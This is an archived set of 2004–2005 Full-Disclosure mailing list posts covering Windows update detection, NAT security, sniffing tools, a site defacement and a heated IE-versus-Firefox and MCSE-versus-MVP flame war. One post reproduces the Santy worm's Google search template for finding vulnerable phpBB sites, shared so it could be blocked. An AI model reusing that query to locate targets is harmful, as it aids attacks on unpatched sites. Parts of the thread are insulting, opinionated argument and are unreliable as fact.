[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB886185 Correction

2005-02-16 Thread Joe Granto
Enterprise Update Scan Tool:
http://support.microsoft.com/?id=894193

This tool seems to be a solution between MBSA releases. This tool may be 
what you need to detect those fixes. From the URL above:

Why does this tool exist?
Microsoft delivers this tool for certain bulletins in an MSRC release 
cycle that cannot be detected by the MBSA or the ODT. Each tool is 
specific to an MSRC release cycle.

and

Why do the MBSA and the ODT not detect this update?
The MBSA and the ODT may not offer full detection for certain bulletins 
in an MSRC release cycle. Full detection may not be available because of 
a limitation of the detection engine or because the product that is 
affected is not supported by the MBSA or the ODT. We are working to 
resolve this issue in future versions of the MBSA through the Windows 
Update Server infrastructure. In the meantime, the Enterprise Update Scan 
Tool is designed to complement the MBSA and the ODT for security update 
detection. Whenever MBSA or ODT cannot offer detection, we plan to 
release an Enterprise Update Scan Tool.


Joe Granto, Senior Engineer
Intel Engineering, MCI (back in black)
Marimba Jedi
Office: (954)377-5632  VNET: 377-5632
Pager:  (888)500-6340 or [EMAIL PROTECTED]
FAX: (954)377-5793

LINUX is only free if your time is worthless.

There is no estimated time of resolution.

Fear my three minute POP time-out.

There is no WorldCom, only Zuul.

WorldCom...  it was all a bad dream.

What's $11 billion between friends?

Complete adj.: having all necessary parts, elements, or steps

Sprint, BP, WorldCom, Qwest, Verizon..  someone make the pain stop.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] NAT router inbound network traffic subversion

2005-01-28 Thread Joe
In message [EMAIL PROTECTED], Kristian Hermansen [EMAIL PROTECTED] writes:
> I have Googled around and asked a highly-respected Professor at my
> University whether it is possible to direct packets behind a NAT router
> without the internal 192.168.x.x clients first requesting a connection
> to the specific host outside.  The answer I received is not possible.
> I also asked if this can be thought of as a security feature, to which
> the reply was again yes.

Yes. But see later.

> Now, I wouldn't place all my bets on his answer and I am calling on
> someone out there to clear up my question.  If NAT really does only
> allow inbound connections with a preliminary request as he suggests, it
> seems that the only way to get an unauthorized packet behind the
> router is by some flaw in the firmware of the device.

If you are not offering any services to the Internet, yes. If you are, 
then you have ports open on the router, redirecting to real machines, 
which may be running software which can be exploited. This is how worms 
spread. The home user is unlikely to be hit by a worm, unless they are 
running a Windows NT-derived operating system, such as XP, without a 
firewall and/or NAT device. Commercial installations such as web servers 
are the main targets for worms.

> How about if the client has requested a connection to Google.com from
> behind his Linksys home NAT router: would it be possible for an outside
> attacker to spoof packets from Google's IP to get packets into the
> network?  Or do we need to know the sequence numbers as well?  Or is
> there an even more devious way to get packets on the inside without a
> client's initiative?

Google for "man in the middle attack".

> Has there been any research into this?  Are there statistics on worm
> propagation and exploited network hosts in relation to those individuals
> that did not own routers (and instead connected directly to their
> modem)?  If *all* home users on the Internet had NAT routers during the
> summer of 2003, would we have significantly slowed the spread of
> Blaster?  I believe these all to be very important questions and the
> security aspects of the ability to route packets behind NAT really
> interests me...maybe some of you can elaborate :-)

Worms are not usually an issue for home users, except when someone sells 
an operating system with ports open to the Internet by default. XP 
pre-service pack 2 is such an operating system. Its users were duly 
hammered by worms, and would not have been if they used the built-in 
firewall, which was not enabled by default. I'm not sure how much a NAT 
device would have helped on its own. Modern versions of Windows are 
extremely talkative, and it may well have invited the bad guys in of its 
own accord. But widespread use of the firewall would have stopped it.

More troublesome for home users are viruses spread by email, which 
initiate connections through the firewall, router or other device from 
the inside. The security device cannot generally tell whether the user 
or a virus has made the request, though third-party 'personal' firewalls, 
running on the user's workstation, are becoming quite good at this.

I don't think Internet Explorer currently runs any code in an incoming 
email automatically, as it once did, but it's not hard to persuade many 
users to click on a button and run the virus themselves. Most viruses 
are now also worms; they will attempt to spread both by email and by 
direct contact with unprotected machines.
--
Joe


[Full-Disclosure] Re: Possible apache2/php 4.3.9 worm

2004-12-21 Thread Joe Stewart
The search query used by the Santy worm uses the following template 
(parentheses contain substitution choices and are not part of the 
literal template) :
 
http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22(random choice between t, p, and topic)%3D(random number between 0 and 3)%22&btnG=Search

Below are some examples of what an actual Santy search request would 
look like:

http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22&btnG=Search
http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22t%3D2580%22&btnG=Search
http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22p%3D6653%22&btnG=Search

If Google were to block this particular pattern of search request it 
would stop the spread of the worm for now.

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/


Re: [Full-Disclosure] HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut !

2004-12-14 Thread joe smith
The pop-up does not work with all options relating to ActiveX set to 
disabled, but most users would not bother to disable it.  Another reason 
to use another browser.

J
[EMAIL PROTECTED] wrote:
> Friday, December 10, 2004
> Internet Explorer 6 on the gadget commonly known as Windows XP SP2 enjoys
> a fairly robust popup blocker.
>
> This little 'thing' has been a major irritation to date. Nothing gets past
> it until now.  Chatter exists that some sites have defeated it on the
> casual default setting. We only deal in the high settings here !
>
> Our Chairman and CEO, Mr. Liu Die Yu takes the sledgehammer and cracks
> open this bothersome little nut like so:
>
> http://www.malware.com/flopup.html
>
> Notes:
> 1. Nothing like a bit of irritation to get constructive
> 2. Additional popup blocker from MSN is also killed, may may Die ! too
> 3. Get editive before it's too late: http://www.editive.com
> 4. None
> End Call
 



Re: [Full-Disclosure] amazon security contact

2004-12-01 Thread joe smith
Search for B05D70 on amazon.com.  Oops, Target forgot to add a 
description to the item.

http://www.amazon.com/exec/obidos/ASIN/B05D70/
or you can get drugs and hookers.
http://www.target.com/gp/detail.html/?%5Fencoding=UTF8&asin=0823916839
http://www.target.com/gp/detail.html/?%5Fencoding=UTF8&asin=B0I1F6
Knarr, Joshua wrote:

> Heh, would this have anything to do with the recent TARGET defacements?
> http://www.target.com/gp/detail.html/601-1627735-4860151?_encoding=UTF8&asin=B05D70
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, December 01, 2004 7:21 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] amazon security contact
>
> Hello,
> does anybody know an email alias at amazon.com to report a
> vulnerability?
>
> I tried to report multiple XSS issues to their customer
> support during the last few days, but got no feedback at all.
>
> mikx


[Full-Disclosure] Network Sniffing

2004-11-30 Thread Crehan, Joe \(EM, ITS, Contractor\)
Gentlemen,

I have been having all kinds of quirky network problems at one of my facilities. I always used SnifferPro to identify top talkers and babbling machines.

Now that I work for The Hive I am no longer allowed to purchase licenses for such wonderful products.

So the question is more of a poll of what the best of the best use for their networks.

M$ and *NIX, cheap and free.


Joe Crehan
Customer Engineer
GE Infrastructure Deskside Support Team
GE Information Technology solutions, Inc.
T 508-698-7567
F 508-698-6940
E [EMAIL PROTECTED]


Re: [Full-Disclosure] Network Sniffing

2004-11-30 Thread joe smith
netcat, ethereal. A good list of tools:
http://www.insecure.org/tools.html

Unknown wrote:
> On Tue, 2004-11-30 at 14:43 -0500, Danny wrote:
>> On Tue, 30 Nov 2004 13:39:02 -0500, Crehan, Joe (EM, ITS, Contractor)
>> [EMAIL PROTECTED] wrote:
>>> Gentlemen,
>>>
>>> I have been having all kinds of quirky network problems at one of my
>>> facilities.  I always used SnifferPro to identify top talkers and babbling
>>> machines.
>>>
>>> Now that I work for The Hive I am no longer allowed to purchase licenses
>>> for such wonderful products.
>>>
>>> So the question is more of a poll of what the best of the best use for
>>> their networks.
>>>
>>> M$ and *NIX, cheap and free.
>>
>> ntop. Ethereal.
>
> Tcpdump.  Ngrep.   Maybe snort? :P
> - K


Re: [Full-Disclosure] Is www.sco.com hacked?

2004-11-29 Thread Joe Matusiewicz
At 07:58 AM 11/29/2004, Rossen Naydenov wrote:
> Hi guys,
> I just noticed the banner on www.sco.com
> If you didn't see it (because it has been removed), this is what they say:
> We own all your code
> pay us all your money
> Or is it some commercial trick?
Perhaps what the lady is writing on the board has some bearing here: 
hacked by realloc(

-- Joe


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-24 Thread joe
FYI. This is just one of the many items currently in the oven that I was
alluding to previously. Of course some people will take this and complain
that people shouldn't be running as admins in the first place (to which I
agree) but prior to complaining about it, hold tight and watch for what else
comes out. MS really shocked me and some others with some of the stuff they
are putting together. It is just taking some time to get spun up in this
newer direction but I think once they are fully aimed that way people will
be a bit dazzled by how much starts coming out. 

I don't expect the coming changes will make everyone happy, both because
there are some areas that just can't be easily fixed and because some people
will never be happy no matter what MS does.


  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of devis
Sent: Wednesday, November 24, 2004 6:45 PM
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

http://msdn.microsoft.com/security/securecode/columns/default.aspx?pull=/library/en-us/dncode/html/secure11152004.asp

Nice ...fresh from the oven too. This, if it works, should be an 'extremely
critical' update from MS.



RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-21 Thread joe
LOL, ok you have me on that one. It is something, but very little. :oD

  Joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!

 

-Original Message-
From: Frank Knobbe [mailto:[EMAIL PROTECTED] 
Sent: Saturday, November 20, 2004 11:54 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

On Sat, 2004-11-20 at 08:20, joe wrote:
> I agree with your initial comment, they can both be changed. I also
> agree they both do little.
>
> I don't agree that the hardcoding in the source does anything for you.

Well, it *allows* you to change the ID of the superuser account to something
else. But of course that is obfuscation, and is quickly discovered (just
check what ID owns /bin/* and so on). Nevertheless, you have the *ability*
to change the ID. You can't do that with Windows. 

(Yeah, cheap shot I know... ;)

Cheers,
Frank




RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-21 Thread joe
OSX is an interesting case but at the moment it is still an infant. I look
forward to seeing what happens with it as you are correct, it is very
consumer oriented. To put it another way, it is a chance for *nix to show
off its normal user wings if it has any. People who would get off Windows
because they have a viable *nix alternative have this option now though
there is still a discrepancy in available commercial packages which I guess
could cause an issue. 


 joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Shoshannah
Forbes
Sent: Sunday, November 21, 2004 3:52 AM
To: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox


Well, Mac OSX is a fully consumer *nix. Can you say that Mac users tend to
be already knowledgeable with its workings or people who WANT to learn the
details using it?

I am not so sure about it.

BTW, on Mac OSX, by default the root account is *disabled*. All
administrative tasks are done with 'su/sudo'.



RE: Re: [Full-Disclosure] IE is just as safe as FireFox: Moved to Education

2004-11-21 Thread joe
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
> The question above is answered IMHO as yes. Anyone who admins
> or is a PC support person would have to agree. Come on, if you
> change their monitor they freak out that their folders are now
> gone!

Absolutely. One bank division I worked at had a lady who would go ballistic
if a single ICON was out of place after work was done on her PC and would
refuse to work until it was corrected. This person was responsible for doing
the money moves for trades and securitizations to maintain liquidity levels
for credit rating which consisted of at least a billion dollars a day. We
would actually have to take a Polaroid photo or screen prints prior to and
after working on her PC for CYA. We also did weekly images of her PC; it was
the only one of the several thousand at that facility we had to do that for.
True story.

  joe
 
--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



RE: [Full-Disclosure] Windows user privileges

2004-11-21 Thread joe

> On Fri, Nov 19, 2004 at 04:19:49PM -0600, Paul Schmehl wrote:
>> Windows has several groups.  By default users are in the USERS
>> group, *not* the ADMINISTRATORS group.
>
> On every XP install that I've seen from every major OEM (Dell,
> Compaq, Gateway, etc) fast user switching is on by default
> and every user is an administrator. Not on most; on every single one.

I would say that is more the fault of the configuration than anything.
Probably cheaper for the OEMs to do it that way from an educational
perspective; they don't have to teach the user anything, just say go. 

  Joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



RE: joe the expert (was Re: [Full-Disclosure] IE is just as safe as FireFox )

2004-11-21 Thread joe
 taken some classes on the NT stuff. I quickly realized that
the classes and the content of the exams wasn't too reflective of what was
done in the real world in Fortune 50 companies so decided against it. I have
not suffered in the least due to that decision.


As a short recap, let's look at some differences between MVPs and MCSEs:

1. Which can occur in shortest time, becoming an MVP or becoming an MCSE?
MCSE - 7-14 days. See bootcamps that are available, I have had friends do it
even without bootcamp. 

2. Which participate in regularly scheduled NDA chats with Microsoft Dev,
product managers, and Execs? MVPs

3. Which ones have to sign NDAs yearly due to sensitive information they are
presented and accesses they have? MVPs

4. Which ones are brought back to Redmond at least once a year for NDA level
meetings with Dev, PM's, and Execs? MVPs

5. Are there more MCSEs or MVPs? MCSEs

6. Who, as a group, has access to Windows Source Code, MCSEs or Windows
MVPs? Windows MVPs. This is to help with the tough outlook questions you
mentioned.

7. How much does it cost to become an MVP? Nothing. How much does it cost to
become an MCSE? Varies, but at the minimum several hundred dollars. Some
spend thousands.

8. How often does an MVP have to be renewed? They don't, every year they
have to be reawarded from scratch. How often does an MCSE have to renew?
Once an MCSE, always an MCSE, however they can upgrade when new OSes are
released every so often. And there are usually upgrade helper methods to
maintain the MCSE, testing from scratch is not required.

10. What kind of peer review is involved with MCSE program? None.  How about
MVPs? MVPs are responsible for nominating other MVPs and are often asked
what they feel about this or that nominee and whether they should be
awarded.


I could go on with this list but I don't need to. There is nothing integral
to the MCSE program that says an MCSE actually has to understand what they
are doing but an MVP who consistently answers things incorrectly will not be
re-awarded if they were mistakenly awarded in the first place. An MCSE
simply has to have the ability to pass written tests in a scheduled time
frame; all that implies is the ability to memorize information for a short
time. 


Maurizio, take the time to look closer at that list of MVPs next time you
are out at the MS Site. I would be highly shocked if you haven't learned
something from one or more of them as it means you aren't reading many (dare
say most) of the good Windows books (as well as non Windows books such as
popular books on DNS and other internet tech) that are available, including
several MCSE study guides. Also tools from several large third party vendors
such as Quest and SysInternals come from the minds of MVPs who are CTOs and
developers. 


  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Maurizio Trinco
Sent: Saturday, November 20, 2004 3:17 PM
To: [EMAIL PROTECTED]
Subject: joe the expert (was Re: [Full-Disclosure] IE is just as safe as
FireFox )

joe [EMAIL PROTECTED] wrote:

> [1] Don't get me started on MCSEs. As a whole I think they hurt Windows far
> more than any other thing. A bunch of people who feel they are experts in
> Windows because they took a couple of tests that 10 year olds could memorize
> and pass and yet still not be able to run anything. The best I can say about
> MCSEs is that I will *try* not to look down upon them for being MCSEs and
> let them prove themselves to be worthless before I assume it in person.

Now from joe's own site, comes this fully untrue
statement:

'So what is a Microsoft MVP? The flip response is a Microsoft MVP is a
person who answers the questions the MCSE/MCD/MCT folks ask.'

My dear Joe,

Let's see what Microsoft has to say about MVPs:
http://mvp.support.microsoft.com/default.aspx?scid=fh;EN-US;mvpfaqs&style=flat

Are Microsoft MVPs experts in all Microsoft technologies and products?
No. Although many MVPs have in-depth knowledge of more than one product or
technology, none of them are experts in all Microsoft technologies or
products.

So, my dear joe, you are nothing but an ego-inflated bullshitter. Your
verbal diarrhea is only matched by your unbelievably low level of competence
when it comes to Microsoft products. Being an MCSE is much more than
answering some how do I send a message with Outlook in one or two
newsgroups. I worked really hard for my MCSE titles and honestly, the idea
that I (or any of my colleagues) could seek enlightenment from you is simply
ridiculous. If you think that passing exams like 216, 296 or the design
exams is something an... er, MVP could do... then you'd better think again.
While I'm an MCSE, I'm by no means an ass-kisser for Microsoft, as your
MVPiness seems to be. Their products, contrary to popular belief, could be
extremely complex (try real life business environment, compared to that
unlicensed version

RE: joe the expert (was Re: [Full-Disclosure] IE is just as safe as FireFox )

2004-11-21 Thread joe
Georgi,

This may sound harsh, but the day I worry about proving my anything to you is
the day after I decide to get the MCSE certification. 

Further, if I ever get to the point about worrying what you think, I will
have to hang my 0 and 1 bits on the rack.

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Georgi Guninski
Sent: Sunday, November 21, 2004 3:01 PM
To: Micheal Espinola Jr
Cc: [EMAIL PROTECTED]
Subject: Re: joe the expert (was Re: [Full-Disclosure] IE is just as safe
as FireFox )

On Sat, Nov 20, 2004 at 06:06:10PM -0500, Micheal Espinola Jr wrote:
> Your accusations against joe's expertise and knowledge in this area are
> completely unsubstantiated.


i have not seen any proofs of joe's expertise or knowledge - can you give
some proofs?

for me joe is just a chatterbox in bed with m$.

--
where do you want bill gates to go today?
   Microsoft Valued Prostitute



RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread joe
Well, if hacking Windows cold across a tcp/ip service such as web, this may be
helpful, but it doesn't require much more than that to figure out what the
admin account is for a given machine.

  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jeremy Davis
Sent: Friday, November 19, 2004 9:40 PM
To: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

Are you able to change root's name in nix? Why not if the answer is no?
(Things would break right? UID 0?) Knowing the account name is two-thirds of
the battle.
In windows it's fairly easy to change the admin name.
Not a professional here just curious...
J




RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread joe
 way won't ever consider moving to the
new platform Q or whatever they choose to call it. This is such a
non-realistic viewpoint it is actually quite laughable. And again, if you go
back to a previous conversation from this list, it isn't all of Windows,
especially Windows kernel/core level stuff that has an issue. It is some key
pieces of the shell. Possibly in your understanding of Windows though, the
Shell is all of what you believe Windows is comprised of. 


  joe


[1] Don't get me started on MCSEs. As a whole I think they hurt Windows far
more than any other thing. A bunch of people who feel they are experts in
Windows because they took a couple of tests that 10 year olds could memorize
and pass and yet still not be able to run anything. The best I can say about
MCSEs is that I will *try* not to look down upon them for being MCSEs and
let them prove themselves to be worthless before I assume it in person. 


--
Pro-Choice
Let me choose if I even want a browser loaded thanks!




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of devis
Sent: Friday, November 19, 2004 11:10 AM
Cc: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

This message is primarily destined to all MS trolls, no matter their levels,
and I can see so many in this list that I am happy to target a large
audience.

Please run some Unix or at least read about the Unix permission system, and
let's pray God this sheds some light in your mono-cultured brains. 
Here are the relevant points:

1) Despite recent ameliorations of MS (multi-user finally, permissions ...)
and some effort at making the system more secure, something very important
is still left out: the first default user of the MS computer is made an
administrator. This comes down to giving uid0 to your first Unix user. Unix
does NOT do that. It requires you to use su and become root (administrator)
after proper credentials submission (password). 
The first user is NOT an administrator, and any recent Unix documentation
will insist on the danger of running as root (admin). Unix keeps the admin
account well separated from the user account, which MS DOESN'T, despite all
the wrong arguments I read on this list. VERY BAD practice generally. So it's
user friendly, as the user has admin rights and can therefore install and
remove software and change major configuration. The majority of users don't and
will never know there is an 'administrator' user that hides from their eyes.
This little detail that apparently MS people can't 'understand' is a huge
step. Please install a proper Unix, create 2 accounts and try to read the
home directory of the second user from the first.

2) "After all, they don't need to know. You're on a need-to-know basis
job."
Do MS really think the users are stupid? Is understanding different IDs /
roles / accounts on a computer that much of a tough message to pass to the
end user? Isn't security important and supposedly the goal of recent MS
developments? If they really did target security, their efforts would have
been into making the user understand that he should be admin to install
programs, and a non-privileged user to surf the web. 
Is that that hard to understand? And that much hidden in high IT security
professional unreachable knowledge? I don't think so. Doesn't a company
such as MS have enough resources to make that a priority and educate the
users? Of course it has. Just not very 'commercially' 
friendly, as if users then understand roles, it might require less anti-virus,
personal firewall and other bullshit FUD scareware (yes, it's
scareware, and it is the best selling software category OF ALL TIME in
software history).


This is why Firefox, being independent from this OS that carries 60 of its
code base as legacy code for older system hardware and backward
compatibility, is likely more secure than the in-house integrated
application. Now if you are running Firefox as an administrator... don't be
surprised if something happens. Don't blame the software, but your poor
security practices.

Let's not hide from ourselves what's needed from MS to reach modern world
security:
a complete rewrite, and a ditch of the old DOS base and the 20-year-old legacy
code.

Hope that clears things.





RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread joe
I agree with your initial comment, they can both be changed. I also agree
they both do little.

I don't agree that the hardcoding in the source does anything for you. 

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!


 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe
Sent: Friday, November 19, 2004 10:42 PM
To: Jeremy Davis
Cc: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

On Fri, 2004-11-19 at 20:40, Jeremy Davis wrote:
> Are you able to change root's name in nix? Why not if the answer is no?
> (Things would break right? UID 0?) Knowing the account name is
> two-thirds of the battle.
> In windows it's fairly easy to change the admin name.
> Not a professional here just curious...

You can change the name of the root account in Unix, just like the
Administrator account in Windows.

But you can not change the UID of the root account (0) just like you can not
change the SID of the Administrator account (500).

I argue that changing the account name in Unix does as little or much as
changing the account name in Windows. If you have access to the system you
can easily find the account name of the UID 0 account, just as easily as you
can figure out the name of the SID x-500 account.

The difference is that you can change and hard code that change in the
source of Unix (at least with those that you have the source for, Linux,
*BSD, whatever). Can you do that with Windows?

Regards,
Frank




RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-20 Thread joe
I think if the main design of any system was run as mortal and do runas for
things that need more, you would have a system that by default, NEVER
allowed interactive logon to an account that does more. Further it wouldn't
let you change that code to allow it. Heck I would even take it further and
say that the raised levels of access would be process only based, once that
process completed, it would revert.

  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!


 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Friday, November 19, 2004 5:14 PM
To: Crotty, Edward
Cc: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox 

On Fri, 19 Nov 2004 13:12:31 EST, Crotty, Edward said:
> I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1.
>
> There is such a thing as runas for Windows.

Yes, but is *the main design* of the system run as a mortal, and use the
'runas' for those things that need more?

Or is the *main design* We'll just elect the first user as Administrator,
and include 'runas' in case somebody wants to Do It The Right Way?



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread joe
 Autoconfig script may enumerate hosts which don't require a proxy. 
 Usually there are a very few intranet servers in corporate network.

You should have prefixed "there are very few..." with one of two things:

1. Relative to the internet...

2. In my experience...


I have been on several large corporate networks where there are hundreds or
thousands of intranet web servers hosting tens of thousands of sites. Many
large enterprise class companies are moving whole hog to web based apps
internally (even email) and all available content is on the internal web. 

This is actually the area where IE is so strongly embedded due to its
application interfaces and what MS has been building towards for so long
with it. If you look at this space and compare how firefox renders/operates
next to IE you will see why many companies chose IE as their official
browser even in the face of having more exposure due to security. A lot of
that depends on how the web site is designed/built but there is a lot of
functionality there that can only be reached (and thereby exploited) on IE.
There are companies whose primary LOB applications internally are on IIS
servers and can only be accessed with IE. In those cases it isn't a simple
pick up and replace the browser scenario. 



 More, I consider IE feature to ignore proxy for LAN hosts may be 
 dangerous. Imagine a worm which spreads by this algorithm: it 
 launches HTTP service on victim host, lures user at another PC to 
 open URL pointing to victim, then launches on target PC. The fact 
 as previously affected host is situated in Local intranet zone,
 significantly facilitates worm spreading.

I wouldn't really call that a worm. Worms work without interaction. They are
self-propagating/replicating. Malware that spreads that requires user
interaction would generally just be called a virus.


Overall trying to push intranet users accessing intranet content through a
proxy to sanitize web pages would be unsatisfactory because it couldn't
fully be enforced since the content is available right there on the
intranet. Someone could do some form of offline gather or use many different
tools to get the data so forcing firefox or IE to go to a specific proxy
does nothing for you. You would have to put the intranet servers behind some
sort of firewall that you would have to access them through. Plus you
obviously have to scale the proxy to a completely different level if
processing all intranet requests as well as internet requests. 


  joe

-- 
Pro-Choice
Let me choose if I even want a browser loaded thanks!




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Raoul
Nakhmanson-Kulish
Sent: Friday, November 19, 2004 5:01 AM
To: Esmond; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

Hello, Esmond!




RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread joe
Georgi, you obviously aren't in touch with the real world if you don't
realize which OS and browser comprise a vast majority of the market. That
penetration often dictates for many IT professionals which OS they will be
working on if they actually choose to work in the field. When you specify
"our" in this way, you are specifying a very small minority.

As someone else mentioned, I believe on this list, they had the option of
working on MS products and making money (that is what companies are in
business for BTW) or working on non-MS products and fighting with other
suppliers over a small market and probably not making any money. 

As much as I hate car analogies... Instead of jumping to a car that runs on
hydrogen because it is safer and better for the environment and bitching at
all of the gas stations that don't sell hydrogen I would rather just stick
with a gasoline vehicle until the hydrogen infrastructure is able to support
a large number of hydrogen vehicles. If I need to drive from Tennessee to
Florida I need to drive, I don't need to spend the time whining and
complaining and trying to find places that can make it so I can actually do
what I need to do. If I have a hydrogen tank by home though, that is perfect
for driving around there as long as it handles everything else I need in
that space. 


  joe

--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



-Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED] 
Sent: Thursday, November 18, 2004 3:55 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

On Wed, Nov 17, 2004 at 09:22:33PM -0500, joe wrote:
 Pro-Choice
 Let me choose if I even want a browser loaded thanks!


what the fuck is this?
we can choose such things on our os, who must let you choose?

--
where do you want bill gates to go today?



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread joe
I 100% agree with you. I never said MS was the best or even that they should
always be used. In fact in many occasions I have pushed for alternative
answers for companies who were customers. 

Being the best or even better doesn't mean you will become the most popular
either. Look at Apple. Look at BetaMax. Look at lots of things. 

To fully be honest though, MS isn't McDonalds. MS in the food world would be
McDonald's, Burger King, Wendy's, Hardee's, Taco Bell, Red Robin, Olive
Garden, Domino's, Pizza Hut, Little Caesars, Jack in the Box, and every
other food chain you know of and also every major diner and eatery you know
of. The things that weren't Microsoft would be the little corner delis,
places that are called names like Michael's kitchen or Mohsin's Falafel
stand. It is a simple fact of life that MS has enough overall market share
to make the penetration of all other OSes look like rounding errors. MS
appeals to the masses, the others appeal to niche areas. Look at the
numbers. This means that we have to do serious work at getting the stuff
corrected. Whining and complaining that they aren't the best or that they
suck or that billg is hellspawn does nothing to help anyone. 

Basically, just because MS is on top, doesn't mean we shouldn't work to push
them to get better or give up and say, "OS * does it much better, forget
them." But at the same time, we have to be realistic about the goals and what
needs to be done. Someone saying that they won't use IE and any web site
that requires it is stupid because they aren't following web standards is
rather shortsighted and having troubles grasping reality. Someone saying
that MS needs to rip all of that out immediately is also having reality
issues. I do think it is right and feasible for MS to give people a choice
as to whether they want IE bits on a machine or not at all (this includes
all of the bits). If I run an MS box and html content doesn't work in my MS
mail reader, I am not going to be overly upset. If I was, then say I install
that component. The realistic gripe is that we don't have the option to not
load IE at the moment. Trying to change that is a realistic goal, definitely
on servers for instance, users aren't visiting web sites from servers or at
least probably shouldn't be. 

Microsoft can become secure and they are working towards it. It is just
going to take a good amount of work to do so. :o)


   joe


--
Pro-Choice
Let me choose if I even want a browser loaded thanks!



-Original Message-
From: john morris [mailto:[EMAIL PROTECTED] 
Sent: Friday, November 19, 2004 4:32 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

Dear Joe, 

So many out there use MS OS doesn't make it the best just as so many people
go to McDonalds doesn't mean they make the best food


--
(FROM LINKS TO LINKS WE ARE ALL LINKED)

cheers.

morris



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-17 Thread joe
I recently spoke with some MS Security Execs and I know they wouldn't argue
with this point. They know they have to improve and are working hard to do
so. It would have been nice had they started this work 10 years or more ago
but thankfully they have started now. 

Someone asked me to describe what I saw and heard about when I went out to
Redmond to check things out recently and all I could really say is they are
ramping up fast in the backend but it takes a while to spin things around
when you have so many people using your product in so many ways. They truly
have a ton of cool stuff they are working on and I personally had no
understanding of how much was going on behind the doors and was quite
surprised to see what I saw and how honest they are being about things
internally. They aren't just standing there telling each other they are the
greatest and all of this will just go away on its own. I realize from the
outside it can look that way, I certainly had my own thoughts that way at
times. It was good to see and hear that the IE team is pretty raw about the
edges over the issues that have occurred over the last few years (as well
they should be) and internally MS sees this and knows it and is working to
correct. 

One thing that was asked for is that they move faster and release tools in
an initially unsupported way to get the feedback sooner so the end results
can be better. Right now they have a tendency to hold things close to chest
for a long time testing and worrying and wanting to try and catch all
possible issues so that they don't release something and get beaten up by a
bunch of boneheads looking to hear their own name on lists and news
broadcasts. This means a lot of stuff that they possibly have answers to
don't see the light of day until a considerable time after the initial punch
in the gut. I personally would be fully happy if tools were put out that
were described as unsupported at the moment but we are working on finalizing
it and releasing it in a supported manner. Then if a problem is found,
feedback is given to MS properly and not an FD post of "oh my god MS sucks
because they are so stupid and I figured it out because I am so L33T, etc
